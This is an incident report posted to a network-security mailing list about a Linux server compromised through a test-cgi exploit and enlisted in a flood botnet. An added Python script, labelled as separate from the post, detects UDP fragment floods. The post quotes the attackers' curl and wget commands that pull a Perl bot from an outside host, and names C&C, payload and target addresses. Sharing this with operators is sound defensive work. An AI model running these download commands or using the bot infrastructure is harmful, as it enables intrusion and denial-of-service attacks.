[nsp-sec] Linux botnet AS14061, 8218, 23118 (C&C), 6739 (target)
Mike Tancsa
mike at sentex.net
Wed Apr 12 15:36:54 EDT 2017
I had a customer's server hacked from 193.225.104.133 back on March 16th
via an old test-cgi exploit. From there, the attackers downloaded a shell
script called pop, which downloaded some perl scripts:
curl -o /tmp/oka http://162.243.110.85/.xa/oka
wget http://162.243.110.85/.xa/oka -O /tmp/oka
which connects to what appears to be an IRC server at 69.77.154.110.
I am guessing that via IRC it was told to download another bot program
from 193.227.248.244, which reaches out to the same host for attack
information.
http://193.227.248.244/intranet/mdb
mdb is a perl program that does tcp/udp floods on demand, getting
commands from 69.77.154.110.
Today's targets were a series of IP addrs in Spain: UDP packets 35,000
bytes in size (lots of fragmentation) directed at
213.37.244.4
213.37.244.5
213.37.244.6
213.37.244.7
37.158.239.230
The attack today was April 12 14:23 UTC from the customer's IP
64.7.142.141. The customer box is cleaned up for now, so please do not
block.
The scripts are attached in the zip file. You can pass on the scripts
as you see fit as well as the C&C info.
Note, the C&C has a bit of a delay on the initial connection. So an
impatient scanner will miss it. The first time it sees your tcp SYN, it
will not respond with a SYN ACK for 20 seconds. It seems to cache things
after that and allow connections normally...
The C&C IP (69.77.154.110) was hard-coded into the perl script I found.
Thanks!
---Mike
--
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike at sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: hack.zip
Type: application/zip
Size: 20708 bytes
Desc: not available
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20170412/901f3da1/attachment.zip>
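As an added example (not from the post or from the attached scripts), here is a small Python check a defender could run over exported flow records to spot the pattern Mike describes: a single host emitting UDP datagrams far above the MTU, and therefore fragmented on the wire, to several targets in a short burst. The record format, the thresholds and the sample records are assumptions; only the addresses are taken from the report.

```python
from collections import defaultdict

# Constructed flow records for illustration: (epoch seconds, src, dst, proto, bytes).
# The addresses are the ones quoted in the report; the records themselves are
# made up and are not taken from the attachment.
SAMPLE_RECORDS = [
    (1492007000, "64.7.142.141", "8.8.8.8",        "udp", 76),     # ordinary DNS query
    (1492007001, "64.7.142.141", "213.37.244.4",   "udp", 35000),
    (1492007001, "64.7.142.141", "213.37.244.5",   "udp", 35000),
    (1492007002, "64.7.142.141", "213.37.244.6",   "udp", 35000),
    (1492007002, "64.7.142.141", "213.37.244.7",   "udp", 35000),
    (1492007003, "64.7.142.141", "37.158.239.230", "udp", 35000),
    (1492007005, "64.7.142.141", "69.77.154.110",  "tcp", 1200),   # C&C chatter, not UDP
    (1492007010, "10.0.0.9",     "10.0.0.53",      "udp", 4096),   # one large EDNS reply
]

MTU = 1500  # a UDP datagram above this size must be IP-fragmented on an Ethernet link


def flag_udp_fragment_floods(records, min_bytes=MTU, min_count=3, window=60):
    """Return {src: {"targets": [...], "max_bytes": n, "count": n}} for every
    source that sends at least `min_count` UDP datagrams larger than
    `min_bytes` within any `window`-second span. Single oversized datagrams
    (e.g. a big DNS answer) stay below min_count and are not reported."""
    by_src = defaultdict(list)
    for ts, src, dst, proto, nbytes in records:
        if proto == "udp" and nbytes > min_bytes:
            by_src[src].append((ts, dst, nbytes))

    flagged = {}
    for src, events in by_src.items():
        events.sort()                      # by timestamp, then destination
        best, lo = [], 0
        for hi in range(len(events)):      # sliding window over the oversized datagrams
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            if hi - lo + 1 > len(best):
                best = events[lo:hi + 1]
        if len(best) >= min_count:
            flagged[src] = {
                "targets": sorted({dst for _, dst, _ in best}),
                "max_bytes": max(nbytes for _, _, nbytes in best),
                "count": len(best),
            }
    return flagged


if __name__ == "__main__":
    for src, info in flag_udp_fragment_floods(SAMPLE_RECORDS).items():
        print(f"{src}: {info['count']} datagrams up to {info['max_bytes']} bytes -> {info['targets']}")
```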